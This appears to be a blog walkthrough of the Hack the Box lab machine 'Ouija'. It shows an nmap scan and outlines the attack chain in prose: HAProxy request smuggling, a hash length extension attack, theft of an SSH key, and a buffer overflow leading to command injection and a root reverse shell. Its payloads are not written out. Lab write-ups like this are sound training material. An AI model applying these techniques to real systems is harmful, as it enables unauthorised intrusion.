In this post, I would like to share a walkthrough of the Ouija Machine from Hack the Box
This room will be considered an Insane machine on Hack the Box
What will you gain from the Ouija machine?
For the user flag, you must abuse the smuggling vulnerability to enable access to a development site that HAProxy is intended to block. This access exposes information about the API, sufficient to perform a hash length extension attack to obtain a valid admin key for the API. With this key, I can exploit the API to read files from the system, including an SSH key, thereby gaining an initial foothold.
As for the root flag, you need to exploit a custom PHP module, written in C and compiled into a .so file containing an integer overflow vulnerability. This vulnerability allows for overwriting variables on the stack, enabling arbitrary write access as root on the system.
Information Gathering on Ouija Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start
┌─[darknite@parrot]─[~/Documents/htb/ouija]
└──╼ $nmap -sV -sC 10.10.11.244 -oA initial
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-17 21:44 EDT
Nmap scan report for 10.10.11.244
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 6ff2b4ed1a918d6ec9105171d57c49bb (ECDSA)
|_ 256 dfddbcdc570d98af0f882f73334862e8 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.71 seconds
┌─[darknite@parrot]─[~/Documents/htb/ouija]
└──╼ $
Let’s access the website interface
It shows an Apache2 Default Page when trying to access the website
After I analysed the Nmap output, I noticed another port opened as 3000 which is configured with the Node.js Express framework
As a result, we will be enumerating further using gobuster due to the lack of information on the website interface itself.
There’s a server-status information showing the log for the Apache Server on the machine.
While looking at the server-status, the process status caught my attention which provides some potential directories that we can investigate later.
Access the website using the domain name
Let’s access the website using a domain name like ouija.htb which shows an actual interface for a Web Application.
At least, we have found the potential username when looking at the Team section
Let’s send one message and see the response to the packet
Sadly, nothing that looks interesting in the response
Let’s try to enumerate further on the website that opens port 3000 to the public but we found an error while doing it.
As a result, let’s insert the additional command as –wildcard switch at the end of the gobuster actual command.
There are a few endpoints that look interesting so let’s try it on the website.
When accessing the endpoint that caught my attention, it required a few data to enter.
Enumerate possible subdomains on the Ouija machine
However, there is no interest to investigate more
Let’s change the wordlist and find a lot more result
There is one subdomain that has caught my attention
We got an error 403 Forbidden when trying to access dev.ouija.htb
On the subdomain gitea.ouija.htb, we have directed you to a Gitea main page.
I noticed there’s one repository that we can look into which is Leila
There is no suspicious thing that appears on the repo
While scrolling below, I noticed there’s HA-Proxy version 2.2.16 which looks new to me.
For those who are not sure about the vulnerability with HA-Proxy version 2.2.16, I hope that the information below makes you understandable
Apache internally listens on port 8080, and the HAProxy reverse proxy version 2.2.16, sourced from the repository, has been identified as vulnerable to request smuggling (GHSA-h2p2-w857-329f / CVE-2023-25725).
It doesn’t work as shown above so let’s workaround with the vulnerabilities
By using that vulnerability that I found earlier, I have found two files that we can investigate further
Let’s analyze the source code which we can use to proceed with the next stage.
We can look into the self-environ which it expose the potential username (Leila)
Sadly, we cannot retrieve the /etc/passwd at the moment
After changing the content-length, it works like a charm!
Let’s do some research on the Hash Length Extension Attack which can be read here
Another resource that can be used here to escalate further
Let’s get some ihash and identification by using hash_extender which can be downloaded here
Let’s obtain the user’s SSH private key and we can copy-paste the key into our machine.
We also can obtain the user flag by doing the method above.
Finally, we have successfully the machine via Leila’s access
We can read the user flag by typing the “cat user.txt” command
Escalate to Root Privileges Access
As usual, we can try to obtain some binary but it failed because we need the password for the Leila
Let’s see the port that opens within the machine and notice that there’s one port that looks unusual
Therefore, let’s do Port-Forwarding on the machine
It looks like a normal login page
As a result, let’s enter common credentials such as admin:admin
Sadly, nothing looks interesting on the Response
There’s one directory that looks different than usual
After looking at the directory, I noticed there is one file that we need to investigate further
The screenshot above shows the source code of the index.php
There’s one file format that we should investigate deeper
Let’s download the file into our machine
We can download it using pwncat-cs
Let’s analyze the file using Ghidra
We should run the command above to escalate further
Let’s create buffer overflow command such as shown in the screenshot above
Therefore, let’s copy-paste the BoF file via Burpsuite
The command injection works like a charm
Finally, we managed to retrieve the reverse shell connection back to us
We can read the root flag by typing the “cat root.txt” command
No responses yet